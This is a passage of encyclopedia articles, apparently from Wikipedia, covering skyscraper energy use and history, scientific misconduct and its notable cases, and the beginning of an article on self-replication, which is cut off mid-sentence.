as the height of the skyscraper increases, and a decrease in the dry bulb temperature as the altitude increases. For example, when moving from 1.5 meters to 284 meters, the dry bulb temperature decreased by 1.85 °C while the wind speeds increased from 2.46 meters per seconds to 7.75 meters per second, which led to a 2.4% decrease in summer cooling in reference to the Freedom Tower in New York City. However, for the same building it was found that the annual energy use intensity was 9.26% higher because of the lack of shading at high altitudes which increased the cooling loads for the remainder of the year while a combination of temperature, wind, shading, and the effects of reflections led to a combined 13.13% increase in annual energy use intensity. In a study performed by Leung and Ray in 2013, it was found that the average energy use intensity of a structure with between 0 and 9 floors was approximately 80 kBtu/ft/yr, while the energy use intensity of a structure with more than 50 floors was about 117 kBtu/ft/yr. Refer to Figure 1 to see the breakdown of how intermediate heights affect the energy use intensity. The slight decrease in energy use intensity over 30-39 floors can be attributed to the fact that the increase in pressure within the heating, cooling, and water distribution systems levels out at a point between 40 and 49 floors and the energy savings due to the microclimate of higher floors are able to be seen. There is a gap in data in which another study looking at the same information but for taller buildings is needed. Elevators A portion of the operational energy increase in tall buildings is related to the usage of elevators because the distance traveled and the speed at which they travel increases as the height of the building increases. Between 5 and 25% of the total energy consumed in a tall building is from the use of elevators. As the height of the building increases it is also more inefficient because of the presence of higher drag and friction losses. Embodied energy The embodied energy associated with the construction of skyscrapers varies based on the materials used. Embodied energy is quantified per unit of material. Skyscrapers inherently have higher embodied energy than low-rise buildings due to the increase in material used as more floors are built. Figures 2 and 3 compare the total embodied energy of different floor types and the unit embodied energy per floor type for buildings with between 20 and 70 stories. For all floor types except for steel-concrete floors, it was found that after 60 stories, there was a decrease in unit embodied energy but when considering all floors, there was exponential growth due to a double dependence on height. The first of which is the relationship between an increase in height leading to an increase in the quantity of materials used, and the second being the increase in height leading to an increase in size of elements to increase the structural capacity of the building. A careful choice in building materials can likely reduce the embodied energy without reducing the number of floors constructed within the bounds presented. Embodied carbon Similar to embodied energy, the embodied carbon of a building is dependent on the materials chosen for its construction. Figures 4 and 5 show the total embodied carbon for different structure types for increasing numbers of stories and the embodied carbon per square meter of gross floor area for the same structure types as the number of stories increases. Both methods of measuring the embodied carbon show that there is a point where the embodied carbon is lowest before increasing again as the height increases. For the total embodied carbon it is dependent on the structure type, but is either around 40 stories, or approximately 60 stories. For the square meter of gross floor area, the lowest embodied carbon was found at either 40 stories, or approximately 70 stories. Air pollution In urban areas, the configuration of buildings can lead to exacerbated wind patterns and an uneven dispersion of pollutants. When the height of buildings surrounding a source of air pollution is increased, the size and occurrence of both "dead-zones" and "hotspots" were increased in areas where there were almost no pollutants and high concentrations of pollutants, respectively. Figure 6 depicts the progression of a Building F's height increasing from 0.0315 units in Case 1, to 0.2 units in Case 2, to 0.6 units in Case 3. This progression shows how as the height of Building F increases, the dispersion of pollutants decreases, but the concentration within the building cluster increases. The variation of velocity fields can be affected by the construction of new buildings as well, rather than solely the increase in height as shown in the figure. As urban centers continue to expand upward and outward, the present velocity fields will continue to trap polluted air close to the tall buildings within the city. Specifically within major cities, a majority of air pollution is derived from transportation, whether it be cars, trains, planes, or boats. As urban sprawl continues and pollutants continue to be emitted, the air pollutants will continue to be trapped within these urban centers. Different pollutants can be detrimental to human health in different ways. For example, particulate matter from vehicular exhaust and power generation can cause asthma, bronchitis, and cancer, while nitrogen dioxide from motor engine combustion processes can cause neurological disfunction and asphyxiation. LEED/green building rating Like with all other buildings, if special measures are taken to incorporate sustainable design methods early on in the design process, it is possible to obtain a green building rating, such as a Leadership in Energy and Environmental Design (LEED) certification. An integrated design approach is crucial in making sure that design decisions that positively impact the whole building are made at the beginning of the process. Because of the massive scale of skyscrapers, the decisions made by the design team must take all factors into account, including the buildings impact on the surrounding community, the effect of the building on the direction in which air and water move, and the impact of the construction process, must be taken into account. There are several design methods that could be employed in the construction of a skyscraper that would take advantage of the height of the building. The microclimates that exist as the height of the building increases can be taken advantage of to increase the natural ventilation, decrease the cooling load, and increase daylighting. Natural ventilation can be increased by utilizing the stack effect, in which warm air moves upward and increases the movement of the air within the building. If utilizing the stack effect, buildings must take extra care to design for fire separation techniques, as the stack effect can also exacerbate the severity of a fire. Skyscrapers are considered to be internally dominated buildings because of their size as well as the fact that a majority are used as some sort of office building with high cooling loads. Due to the microclimate created at the upper floors with the increased wind speed and the decreased dry bulb temperatures, the cooling load will naturally be reduced because of infiltration through the thermal envelope. By taking advantage of the naturally cooler temperatures at higher altitudes, skyscrapers can reduce their cooling loads passively. On the other side of this argument, is the lack of shading at higher altitudes by other buildings, so the solar heat gain will be larger for higher floors than for floors at the lower end of the building. Special measures should be taken to shade upper floors from sunlight during the overheated period to ensure thermal comfort without increasing the cooling load. History of the tallest skyscrapers At the beginning of the 20th century, New York City was a center for the Beaux-Arts architectural movement, attracting the talents of such great architects as Stanford White and Carrere and Hastings. As better construction and engineering technology became available as the century progressed, New York City and Chicago became the focal point of the competition for the tallest building in the world. Each city's striking skyline has been composed of numerous and varied skyscrapers, many of which are icons of 20th-century architecture: The E. V. Haughwout Building in Manhattan was the first building to successfully install a passenger elevator, doing so on 23 March 1857. The Equitable Life Building in Manhattan was the first office building to feature passenger elevators. The Home Insurance Building in Chicago, which was built in 1884, was the first tall building with a steel skeleton. The Singer Building, an expansion to an existing structure in Lower Manhattan was the world's tallest building when completed in 1908. Designed by Ernest Flagg, it was tall. The Metropolitan Life Insurance Company Tower, across Madison Square Park from the Flatiron Building, was the world's tallest building when completed in 1909. It was designed by the architectural firm of Napoleon LeBrun & Sons and stood tall. The Woolworth Building, a neo-Gothic "Cathedral of Commerce" overlooking New York City Hall, was designed by Cass Gilbert. At 792 feet (241 m), it became the world's tallest building upon its completion in 1913, an honor it retained until 1930. 40 Wall Street, a 71-story, neo-Gothic tower designed by H. Craig Severance, was the world's tallest building for a month in May 1930. The Chrysler Building in New York City took the lead in late May 1930 as the tallest building in the world, reaching 1,046 feet (319 m). Designed by William Van Alen, an Art Deco style masterpiece with an exterior crafted of brick, the Chrysler Building continues to be a favorite of New Yorkers to this day. The Empire State Building, nine streets south of the Chrysler in Manhattan, topped out at 1,250 feet (381 m) and 102 stories in 1931. The first building to have more than 100 floors, it was designed by Shreve, Lamb and Harmon in the contemporary Art Deco style and takes its name from the nickname of New York State. The antenna mast added in 1951 brought pinnacle height to 1,472 feet (449 m), lowered in 1984 to 1,454 feet (443 m). The World Trade Center officially surpassed the Empire State Building in 1970, was completed in 1973, and consisted of two tall towers and several smaller buildings. For a short time the World Trade Center's North Tower―completed in 1972―was the world's tallest building, until surpassed by the Sears Tower in 1973. Upon completion, the towers stood for 28 years, until the September 11 attacks destroyed the buildings in 2001. The Sears Tower (now known as Willis Tower) was completed in 1974. It was the first building to employ the "bundled tube" structural system, designed by Fazlur Khan. It was surpassed in height by the Petronas Towers in 1998, but remained the tallest in some categories until Burj Khalifa surpassed it in all categories in 2010. It is currently the third tallest building in the United States, after One World Trade Center (which was built following 9/11), and Central Park Tower in New York City. Momentum in setting records passed from the United States to other nations with the opening of the Petronas Twin Towers in Kuala Lumpur, Malaysia, in 1998. The record for the world's tallest building has remained in Asia since the opening of Taipei 101 in Taipei, Taiwan, in 2004. A number of architectural records, including those of the world's tallest building and tallest free-standing structure, moved to the Middle East with the opening of the Burj Khalifa in Dubai, United Arab Emirates. This geographical transition is accompanied by a change in approach to skyscraper design. For much of the 20th century large buildings took the form of simple geometrical shapes. This reflected the "international style" or modernist philosophy shaped by Bauhaus architects early in the century. The last of these, the Willis Tower and World Trade Center towers in New York, erected in the 1970s, reflect the philosophy. Tastes shifted in the decade which followed, and new skyscrapers began to exhibit postmodernist influences. This approach to design avails itself of historical elements, often adapted and re-interpreted, in creating technologically modern structures. The Petronas Twin Towers recall Asian pagoda architecture and Islamic geometric principles. Taipei 101 likewise reflects the pagoda tradition as it incorporates ancient motifs such as the ruyi symbol. The Burj Khalifa draws inspiration from traditional Islamic art. Architects in recent years have sought to create structures that would not appear equally at home if set in any part of the world, but that reflect the culture thriving in the spot where they stand. The following list measures height of the roof, not the pinnacle. The more common gauge is the "highest architectural detail"; such ranking would have included Petronas Towers, built in 1996. Gallery Future developments Proposals for such structures have been put forward, including the Burj Mubarak Al Kabir in Kuwait and Azerbaijan Tower in Baku. Kilometer-plus structures present architectural challenges that may eventually place them in a new architectural category. The first building under construction and planned to be over one kilometre tall is the Jeddah Tower. Wooden skyscrapers Several wooden skyscraper designs have been designed and built. A 14-story housing project in Bergen, Norway known as 'Treet' or 'The Tree' became the world's tallest wooden apartment block when it was completed in late 2015. The Tree's record was eclipsed by Brock Commons, an 18-story wooden dormitory at the University of British Columbia in Canada, when it was completed in September 2016. A 40-story residential building 'Trätoppen' has been proposed by architect Anders Berensson to be built in Stockholm, Sweden. Trätoppen would be the tallest building in Stockholm, though there are no immediate plans to begin construction. The tallest currently-planned wooden skyscraper is the 70-story W350 Project in Tokyo, to be built by the Japanese wood products company Sumitomo Forestry Co. to celebrate its 350th anniversary in 2041. An 80-story wooden skyscraper, the River Beech Tower, has been proposed by a team including architects Perkins + Will and the University of Cambridge. The River Beech Tower, on the banks of the Chicago River in Chicago, Illinois, would be 348 feet shorter than the W350 Project despite having 10 more storys. Wooden skyscrapers are estimated to be around a quarter of the weight of an equivalent reinforced-concrete structure as well as reducing the building carbon footprint by 60–75%. Buildings have been designed using cross-laminated timber (CLT) which gives a higher rigidity and strength to wooden structures. CLT panels are prefabricated and can therefore save on building time.
Technology
Mixed-use buildings
null
29537
https://en.wikipedia.org/wiki/Scientific%20misconduct
Scientific misconduct
Scientific misconduct is the violation of the standard codes of scholarly conduct and ethical behavior in the publication of professional scientific research. It is violation of scientific integrity: violation of the scientific method and of research ethics in science, including in the design, conduct, and reporting of research. A Lancet review on Handling of Scientific Misconduct in Scandinavian countries provides the following sample definitions, reproduced in The COPE report 1999: Danish definition: "Intention or gross negligence leading to fabrication of the scientific message or a false credit or emphasis given to a scientist" Swedish definition: "Intention[al] distortion of the research process by fabrication of data, text, hypothesis, or methods from another researcher's manuscript form or publication; or distortion of the research process in other ways." The consequences of scientific misconduct can be damaging for perpetrators and journal audience and for any individual who exposes it. In addition there are public health implications attached to the promotion of medical or other interventions based on false or fabricated research findings. Scientific misconduct can result in loss of public trust in the integrity of science. Three percent of the 3,475 research institutions that report to the US Department of Health and Human Services' Office of Research Integrity, indicate some form of scientific misconduct. However the ORI will only investigate allegations of impropriety where research was funded by federal grants. They routinely monitor such research publications for red flags and their investigation is subject to a statute of limitations. Other private organizations like the Committee of Medical Journal Editors (COJE) can only police their own members. Motivation According to David Goodstein of Caltech, there are motivators for scientists to commit misconduct, which are briefly summarised here. Career pressure Science is still a very strongly career-driven discipline. Scientists depend on a good reputation to receive ongoing support and funding, and a good reputation relies largely on the publication of high-profile scientific papers. Hence, there is a strong imperative to "publish or perish". This may motivate desperate (or fame-hungry) scientists to fabricate results. Ease of fabrication In many scientific fields, results are often difficult to reproduce accurately, being obscured by noise, artifacts, and other extraneous data. That means that even if a scientist does falsify data, they can expect to get away with it – or at least claim innocence if their results conflict with others in the same field. There are few strongly backed systems to investigate possible violations, attempt to press charges, or punish deliberate misconduct. It is relatively easy to cheat although difficult to know exactly how many scientists fabricate data. Monetary Gain In many scientific fields, the most lucrative options for professionals are often selling opinions. Corporations can pay experts to support products directly or indirectly via conferences. Psychologists can make money by repeatedly acting as an expert witness in custody proceedings for the same law firms. Forms The U.S. National Science Foundation defines three types of research misconduct: fabrication, falsification, and plagiarism. Fabrication is making up results and recording or reporting them. This is sometimes referred to as "drylabbing". A more minor form of fabrication is where references are included to give arguments the appearance of widespread acceptance, but are actually fake, or do not support the argument. Falsification is manipulating research materials, equipment, or processes or changing or omitting data or results such that the research is not accurately represented in the research record. Plagiarism is the appropriation of another person's ideas, processes, results, or words without giving appropriate credit. One form is the appropriation of the ideas and results of others, and publishing as to make it appear the author had performed all the work under which the data was obtained. A subset is citation plagiarism – willful or negligent failure to appropriately credit other or prior discoverers, so as to give an improper impression of priority. This is also known as, "citation amnesia", the "disregard syndrome" and "bibliographic negligence". Arguably, this is the most common type of scientific misconduct. Sometimes it is difficult to guess whether authors intentionally ignored a highly relevant cite or lacked knowledge of the prior work. Discovery credit can also be inadvertently reassigned from the original discoverer to a better-known researcher. This is a special case of the Matthew effect. Plagiarism-fabrication – the act of taking an unrelated figure from an unrelated publication and reproducing it exactly in a new publication, claiming that it represents new data. Self-plagiarism – or multiple publication of the same content with different titles or in different journals is sometimes also considered misconduct; scientific journals explicitly ask authors not to do this. It is referred to as "salami" (i.e. many identical slices) in the jargon of medical journal editors. According to some editors this includes publishing the same article in a different language. Other types of research misconduct are also recognized: Ghostwriting – the phenomenon where someone other than the named author(s) makes a major contribution. Typically, this is done to mask contributions from authors with a conflict of interest. Guest authorship - phenomenon where authorship is given to someone who has not made any substantial contribution. This can done by senior researchers who muscle their way onto the papers of inexperienced junior researchers as well as others that stack authorship in an effort to guarantee publication. This is much harder to prove due to a lack of consistency in defining "authorship" or "substantial contribution". Scientific misconduct can also occur during the peer-review process by a reviewer or editor with a conflict of interest. Reviewer-coerced citation can also inflate the perceived citation impact of a researcher's work and their reputation in the scientific community, similar to excessive self-citation. Reviewers are expected to be impartial and assess the quality of their work. They are expected to declare a conflict of interest to the editors if they are colleagues or competitors of the authors. A rarer case of scientific misconduct is editorial misconduct, where an editor does not declare conflicts of interest, creates pseudonyms to review papers, gives strongly worded editorial decisions to support reviews suggesting to add excessive citations to their own unrelated works or to add themselves as a co-author or their name to the title of the manuscript. Publishing in a predatory journal, knowingly or unknowingly, was discussed as a form of potential scientific misconduct. The peer-review process can have limitations when considering research outside the conventional scientific paradigm: social factors such as "groupthink" can interfere with open and fair deliberation of new research. Sneaked references – the act of subtly embedding references that are not present in a manuscript in the metadata of this accepted manuscript without the original authors being capable of noticing or correcting such modifications. Photo manipulation Compared to other forms of scientific misconduct, image fraud (manipulation of images to distort their meaning) is of particular interest since it can frequently be detected by external parties. In 2006, the Journal of Cell Biology gained publicity for instituting tests to detect photo manipulation in papers that were being considered for publication. This was in response to the increased usage of programs such as Adobe Photoshop by scientists, which facilitate photo manipulation. Since then more publishers, including the Nature Publishing Group, have instituted similar tests and require authors to minimize and specify the extent of photo manipulation when a manuscript is submitted for publication. However, there is little evidence to indicate that such tests are applied rigorously. One Nature paper published in 2009 has subsequently been reported to contain around 20 separate instances of image fraud. Although the type of manipulation that is allowed can depend greatly on the type of experiment that is presented and also differ from one journal to another, in general the following manipulations are not allowed: splicing together different images to represent a single experiment changing brightness and contrast of only a part of the image any change that conceals information, even when it is considered to be non-specific, which includes: changing brightness and contrast to leave only the most intense signal using clone tools to hide information showing only a very small part of the photograph so that additional information is not visible Image manipulations are typically done on visually repetitive images such as those of blots and microscope images. Helicopter research Responsibilities Authorship responsibility All authors of a scientific publication are expected to have made reasonable attempts to check findings submitted to academic journals for publication. Simultaneous submission of scientific findings to more than one journal or duplicate publication of findings is usually regarded as misconduct, under what is known as the Ingelfinger rule, named after the editor of The New England Journal of Medicine 1967–1977, Franz Ingelfinger. Guest authorship (where there is stated authorship in the absence of involvement, also known as gift authorship) and ghost authorship (where the real author is not listed as an author) are commonly regarded as forms of research misconduct. In some cases coauthors of faked research have been accused of inappropriate behavior or research misconduct for failing to verify reports authored by others or by a commercial sponsor. Examples include the case of Gerald Schatten who co-authored with Hwang Woo-Suk, the case of Professor Geoffrey Chamberlain named as guest author of papers fabricated by Malcolm Pearce, (Chamberlain was exonerated from collusion in Pearce's deception) – and the coauthors with Jan Hendrik Schön at Bell Laboratories. More recent cases include that of Charles Nemeroff, then the editor-in-chief of Neuropsychopharmacology, and a well-documented case involving the drug Actonel. Authors are expected to keep all study data for later examination even after publication. The failure to keep data may be regarded as misconduct. Some scientific journals require that authors provide information to allow readers to determine whether the authors might have commercial or non-commercial conflicts of interest. Authors are also commonly required to provide information about ethical aspects of research, particularly where research involves human or animal participants or use of biological material. Provision of incorrect information to journals may be regarded as misconduct. Financial pressures on universities have encouraged this type of misconduct. The majority of recent cases of alleged misconduct involving undisclosed conflicts of interest or failure of the authors to have seen scientific data involve collaborative research between scientists and biotechnology companies. Research institution responsibility In general, defining whether an individual is guilty of misconduct requires a detailed investigation by the individual's employing academic institution. Such investigations require detailed and rigorous processes and can be extremely costly. Furthermore, the more senior the individual under suspicion, the more likely it is that conflicts of interest will compromise the investigation. In many countries (with the notable exception of the United States) acquisition of funds on the basis of fraudulent data is not a legal offence and there is consequently no regulator to oversee investigations into alleged research misconduct. Universities therefore have few incentives to investigate allegations in a robust manner, or act on the findings of such investigations if they vindicate the allegation. Well publicised cases illustrate the potential role that senior academics in research institutions play in concealing scientific misconduct. A King's College (London) internal investigation showed research findings from one of their researchers to be 'at best unreliable, and in many cases spurious' but the college took no action, such as retracting relevant published research or preventing further episodes from occurring. In a more recent case an internal investigation at the National Centre for Cell Science (NCCS), Pune determined that there was evidence of misconduct by Gopal Kundu, but an external committee was then organised which dismissed the allegation, and the NCCS issued a memorandum exonerating the authors of all charges of misconduct. Undeterred by the NCCS exoneration, the relevant journal (Journal of Biological Chemistry) withdrew the paper based on its own analysis. Scientific peer responsibility Some academics believe that scientific colleagues who suspect scientific misconduct should consider taking informal action themselves, or reporting their concerns. This question is of great importance since much research suggests that it is very difficult for people to act or come forward when they see unacceptable behavior, unless they have help from their organizations. A "User-friendly Guide," and the existence of a confidential organizational ombudsman may help people who are uncertain about what to do, or afraid of bad consequences for their speaking up. Responsibility of journals Journals are responsible for safeguarding the research record and hence have a critical role in dealing with suspected misconduct. This is recognised by the Committee on Publication Ethics (COPE) which has issued clear guidelines on the form (e.g. retraction) that concerns over the research record should take. The COPE guidelines state that journal editors should consider retracting a publication if they have clear evidence that the findings are unreliable, either as a result of misconduct (e.g. data fabrication) or honest error (e.g. miscalculation or experimental error). Retraction is also appropriate in cases of redundant publication, plagiarism and unethical research. Journal editors should consider issuing an expression of concern if they receive inconclusive evidence of research or publication misconduct by the authors, there is evidence that the findings are unreliable but the authors' institution will not investigate the case, they believe that an investigation into alleged misconduct related to the publication either has not been, or would not be, fair and impartial or conclusive, or an investigation is underway but a judgement will not be available for a considerable time. Journal editors should consider issuing a correction if a small portion of an otherwise reliable publication proves to be misleading (especially because of honest error), or the author / contributor list is incorrect (i.e. a deserving author has been omitted or somebody who does not meet authorship criteria has been included). Evidence emerged in 2012 that journals learning of cases where there is strong evidence of possible misconduct, with issues potentially affecting a large portion of the findings, frequently fail to issue an expression of concern or correspond with the host institution so that an investigation can be undertaken. In one case, Nature allowed a corrigendum to be published despite clear evidence of image fraud. Subsequent retraction of the paper required the actions of an independent whistleblower. The cases of Joachim Boldt and Yoshitaka Fujii in anaesthesiology focussed attention on the role that journals play in perpetuating scientific fraud as well as how they can deal with it. In the Boldt case, the editors-in-chief of 18 specialist journals (generally anaesthesia and intensive care) made a joint statement regarding 88 published clinical trials conducted without Ethics Committee approval. In the Fujii case, involving nearly 200 papers, the journal Anesthesia & Analgesia, which published 24 of Fujii's papers, has accepted that its handling of the issue was inadequate. Following publication of a letter to the editor from Kranke and colleagues in April 2000, along with a non-specific response from Dr. Fujii, there was no follow-up on the allegation of data manipulation and no request for an institutional review of Dr. Fujii's research. Anesthesia & Analgesia went on to publish 11 additional manuscripts by Dr. Fujii following the 2000 allegations of research fraud, with Editor Steven Shafer stating in March 2012 that subsequent submissions to the Journal by Dr. Fujii should not have been published without first vetting the allegations of fraud. In April 2012 Shafer led a group of editors to write a joint statement, in the form of an ultimatum made available to the public, to a large number of academic institutions where Fujii had been employed, offering these institutions the chance to attest to the integrity of the bulk of the allegedly fraudulent papers. Consequences of scientific misconduct Consequences for science The consequences of scientific fraud vary based on the severity of the fraud, the level of notice it receives, and how long it goes undetected. For cases of fabricated evidence, the consequences can be wide-ranging, with others working to confirm (or refute) the false finding, or with research agendas being distorted to address the fraudulent evidence. The Piltdown Man fraud is a case in point: The significance of the bona-fide fossils that were being found was muted for decades because they disagreed with Piltdown Man and the preconceived notions that those faked fossils supported. In addition, the prominent paleontologist Arthur Smith Woodward spent time at Piltdown each year until he died, trying to find more Piltdown Man remains. The misdirection of resources kept others from taking the real fossils more seriously and delayed the reaching of a correct understanding of human evolution. (The Taung Child, which should have been the death knell for the view that the human brain evolved first, was instead treated very critically because of its disagreement with the Piltdown Man evidence.) In the case of Prof Don Poldermans, the misconduct occurred in reports of trials of treatment to prevent death and myocardial infarction in patients undergoing operations. The trial reports were relied upon to issue guidelines that applied for many years across North America and Europe. In the case of Dr Alfred Steinschneider, two decades and tens of millions of research dollars were lost trying to find the elusive link between infant sleep apnea, which Steinschneider said he had observed and recorded in his laboratory, and sudden infant death syndrome (SIDS), of which he stated it was a precursor. The cover was blown in 1994, 22 years after Steinschneider's 1972 Pediatrics paper claiming such an association, when Waneta Hoyt, the mother of the patients in the paper, was arrested, indicted and convicted on five counts of second-degree murder for the smothering deaths of her five children. While that in itself was bad enough, the paper, presumably written as an attempt to save infants' lives, ironically was ultimately used as a defense by parents suspected in multiple deaths of their own children in cases of Münchausen syndrome by proxy. The 1972 Pediatrics paper was cited in 404 papers in the interim and is still listed on Pubmed without comment. Consequences for those who expose misconduct The potentially severe consequences for individuals who are found to have engaged in misconduct also reflect on the institutions that host or employ them and also on the participants in any peer review process that has allowed the publication of questionable research. This means that a range of actors in any case may have a motivation to suppress any evidence or suggestion of misconduct. Persons who expose such cases, commonly called whistleblowers, find themselves open to retaliation by a number of different means. These negative consequences for exposers of misconduct have driven the development of whistle blowers charters – designed to protect those who raise concerns (for more details refer to retaliation (law)). Regulatory Violations and Consequences (example) Title 10 Code of Federal Regulation (CFR) Part 50.5, Deliberate Misconduct of the U.S. Nuclear Regulatory Commission (NRC) regulations, addresses the prohibition of certain activities by individual involved in NRC-licensed activities. 10 CFR 50.5 is designed to ensure the safety and integrity of nuclear operations. 10 CFR Part 50.9, Completeness and Accuracy of Information, focuses on the requirements for providing information and data to the NRC. The intent of 10 CFR 50.5 is to deter and penalize intentional wrongdoing (i.e., violations). 10 CFR 50.9 is crucial in maintaining transparency and reliability in the nuclear industry, which effectively emphasizes honesty and integrity in maintaining the safety and security of nuclear operations. Providing false or misleading information or data to the NRC is therefore a violation of 10 CFR 50.9. Violation of any of these rules can lead to severe penalties, including termination, fines and criminal prosecution. It can also result in the revocation of licenses or certifications, thereby barring individuals or entities from participating in any NRC-licensed activities in the future. Data issues Exposure of fraudulent data With the advancement of the internet, there are now several tools available to aid in the detection of plagiarism and multiple publication within biomedical literature. One tool developed in 2006 by researchers in Dr. Harold Garner's laboratory at the University of Texas Southwestern Medical Center at Dallas is Déjà vu, an open-access database containing several thousand instances of duplicate publication. All of the entries in the database were discovered through the use of text data mining algorithm eTBLAST, also created in Dr. Garner's laboratory. The creation of Déjà vu and the subsequent classification of several hundred articles contained therein have ignited much discussion in the scientific community concerning issues such as ethical behavior, journal standards, and intellectual copyright. Studies on this database have been published in journals such as Nature and Science, among others. Other tools which may be used to detect fraudulent data include error analysis. Measurements generally have a small amount of error, and repeated measurements of the same item will generally result in slight differences in readings. These differences can be analyzed, and follow certain known mathematical and statistical properties. Should a set of data appear to be too faithful to the hypothesis, i.e., the amount of error that would normally be in such measurements does not appear, a conclusion can be drawn that the data may have been forged. Error analysis alone is typically not sufficient to prove that data have been falsified or fabricated, but it may provide the supporting evidence necessary to confirm suspicions of misconduct. Data sharing Kirby Lee and Lisa Bero suggest, "Although reviewing raw data can be difficult, time-consuming and expensive, having such a policy would hold authors more accountable for the accuracy of their data and potentially reduce scientific fraud or misconduct." Underreporting The vast majority of cases of scientific misconduct may not be reported. The number of article retractions in 2022 was nearly 5,500, but Ivan Oransky and Adam Marcus, co-founders of Retraction Watch, estimate that at least 100,000 retractions should occur every year, with only about one in five being due to "honest error". Some notable cases In 1998 Andrew Wakefield published a fraudulent research paper in The Lancet claiming links between the MMR vaccine, autism, and inflammatory bowel disease. In 2010, he was found guilty of dishonesty in his research and banned from medicine by the UK General Medical Council following an investigation by Brian Deer of the London Sunday Times. The claims in Wakefield's paper were widely reported, leading to a sharp drop in vaccination rates in the UK and Ireland and outbreaks of mumps and measles. Promotion of the claimed link continues to fuel the anti-vaccination movement. In 2011 Diederik Stapel, a highly regarded Dutch social psychologist was discovered to have fabricated data in dozens of studies on human behaviour. He has been called "the biggest con man in academic science". In 2020, Sapan Desai and his coauthors published two papers in the prestigious medical journals The Lancet and The New England Journal of Medicine, early in the COVID-19 pandemic. The papers were based on a very large dataset published by Surgisphere, a company owned by Desai. The dataset was exposed as a fabrication, and the papers were soon retracted. In 2024, Eliezer Masliah, head of the Division of Neuroscience at the National Institute on Aging, was suspected of having manipulated and inappropriately reused images in over 100 scientific papers spanning several decades, including those that were used by the FDA to greenlight testing for the experimental drug prasinezumab as a treatment for Parkinson's. Solutions Changing research assessment Since 2012, the Declaration on Research Assessment (DORA), from San Francisco, gathered many institutions, publishers, and individuals committing to improving the metrics used to assess research and to stop focusing on the journal impact factor.
Physical sciences
Science basics
Basics and measurement
29549
https://en.wikipedia.org/wiki/Self-replication
Self-replication
Self-replication is any behavior of a dynamical system that yields construction of an identical or similar copy of itself. Biological cells, given suitable environments, reproduce by cell division. During cell division, DNA is replicated and can be transmitted to offspring during reproduction. Biological viruses can replicate, but only by commandeering the reproductive machinery of cells through a process of infection. Harmful prion proteins can replicate by converting normal proteins into rogue forms. Computer viruses reproduce using the hardware and software already present on computers. Self-replication in robotics has been an area of research and a subject of interest in science fiction. Any self-replicating mechanism which does not make a perfect copy (mutation) will experience genetic variation and will create variants of itself. These variants will be subject to natural selection, since some will be better at surviving in their current environment than others and will out-breed them. Overview Theory Early research by John von Neumann established that replicators have several parts: A coded representation of the replicator A mechanism to copy the coded representation A mechanism for effecting construction within the host environment of the replicator Exceptions to this pattern may be possible, although almost all known examples adhere to it. Scientists have come close to constructing RNA that can be copied in an "environment" that is a solution of RNA monomers and transcriptase, but such systems are more accurately characterized as "assisted replication" than "self-replication". In 2021 researchers succeeded in constructing a system with sixteen specially designed DNA sequences. Four of these can be linked together (through base pairing) in a certain order following a template of four already-linked sequences, by changing the temperature up and down. The number of template copies is thus increased in each cycle. No external agent such as an enzyme is needed, but the system must be supplied with a reservoir of the sixteen DNA sequences. The simplest possible case is that only a genome exists. Without some specification of the self-reproducing steps, a genome-only system is probably better characterized as something like a crystal. Origin of life Self-replication is a fundamental feature of life. It was proposed that self-replication emerged in the evolution of life when a molecule similar to a double-stranded polynucleotide (possibly like RNA) dissociated into single-stranded polynucleotides and each of these acted as a template for synthesis of a complementary strand producing two double stranded copies. In a system such as this, individual duplex replicators with different nucleotide sequences could compete with each other for available mononucleotide resources, thus initiating natural selection for the most “fit” sequences. Replication of these early forms of life was likely highly inaccurate producing mutations that influenced the folding state of the polynucleotides, thus affecting the propensities for strand association (promoting stability) and disassociation (allowing genome replication). The evolution of order in living systems has been proposed to be an example of a fundamental order generating principle that also applies to physical systems. Classes of self-replication Recent research has begun to categorize replicators, often based on the amount of support they require. Natural replicators have all or most of their design from nonhuman sources. Such systems include natural life forms. Autotrophic replicators can reproduce themselves "in the wild". They mine their own materials. It is conjectured that non-biological autotrophic replicators could be designed by humans, and could easily accept specifications for human products. Self-reproductive systems are conjectured systems which would produce copies of themselves from industrial feedstocks such as metal bar and wire. Self-assembling systems assemble copies of themselves from finished, delivered parts. Simple examples of such systems have been demonstrated at the macro scale. The design space for machine replicators is very broad. A comprehensive study to date by Robert Freitas and Ralph Merkle has identified 137 design dimensions grouped into a dozen separate categories, including: (1) Replication Control, (2) Replication Information, (3) Replication Substrate, (4) Replicator Structure, (5) Passive Parts, (6) Active Subunits, (7) Replicator Energetics, (8) Replicator Kinematics, (9) Replication Process, (10) Replicator Performance, (11) Product Structure, and (12) Evolvability. A self-replicating computer program In computer science a quine is a self-reproducing computer program that, when executed, outputs its own code. For example, a quine in the Python programming language is: A more trivial approach is to write a program that will make a copy of any stream of data that it is directed to, and then direct it at itself. In this case the program is treated as both executable code, and as data to be manipulated. This approach is common in most self-replicating systems, including biological life, and is simpler as it does not require the program to contain a complete description of itself. In many programming languages an empty program is legal, and executes without producing errors or other output. The output is thus the same as the source code, so the program is trivially self-reproducing. Self-replicating tiling In geometry a self-replicating tiling is a tiling pattern in which several congruent tiles may be joined together to form a larger tile that is similar to the original. This is an aspect of the field of study known as tessellation. The "sphinx" hexiamond is the only known self-replicating pentagon. For example, four such concave pentagons can be joined together to make one with twice the dimensions. Solomon W. Golomb coined the term rep-tiles for self-replicating tilings. In 2012, Lee Sallows identified rep-tiles as a special instance of a self-tiling tile set or setiset. A setiset of order n is a set of n shapes that can be assembled in n different ways so as to form larger replicas of themselves. Setisets in which every shape is distinct are called 'perfect'. A rep-n rep-tile is just a setiset composed of n identical pieces. Self replicating clay crystals One form of natural self-replication that is not based on DNA or RNA occurs in clay crystals. Clay consists of a large number of small crystals, and clay is an environment that promotes crystal growth. Crystals consist of a regular lattice of atoms and are able to grow if e.g. placed in a water solution containing the crystal components; automatically arranging atoms at the crystal boundary into the crystalline form. Crystals may have irregularities where the regular atomic structure is broken, and when crystals grow, these irregularities may propagate, creating a form of self-replication of crystal irregularities. Because these irregularities may affect the probability of a crystal breaking apart to form new crystals, crystals with such irregularities could even be considered to undergo evolutionary development. Applications It is a long-term goal of some engineering sciences to achieve a clanking replicator, a material device that can self-replicate. The usual reason is to achieve a low cost per item while retaining the utility of a manufactured good. Many authorities say that in the limit, the cost of self-replicating items should approach the cost-per-weight of wood or other biological substances, because self-replication avoids the costs of labor, capital and distribution in conventional manufactured goods. A fully novel artificial replicator is a reasonable near-term goal. A NASA study recently placed the complexity of a clanking replicator at approximately that of Intel's Pentium 4 CPU. That is, the technology is achievable with a relatively small engineering group in a reasonable commercial time-scale at a reasonable cost. Given the currently keen interest in 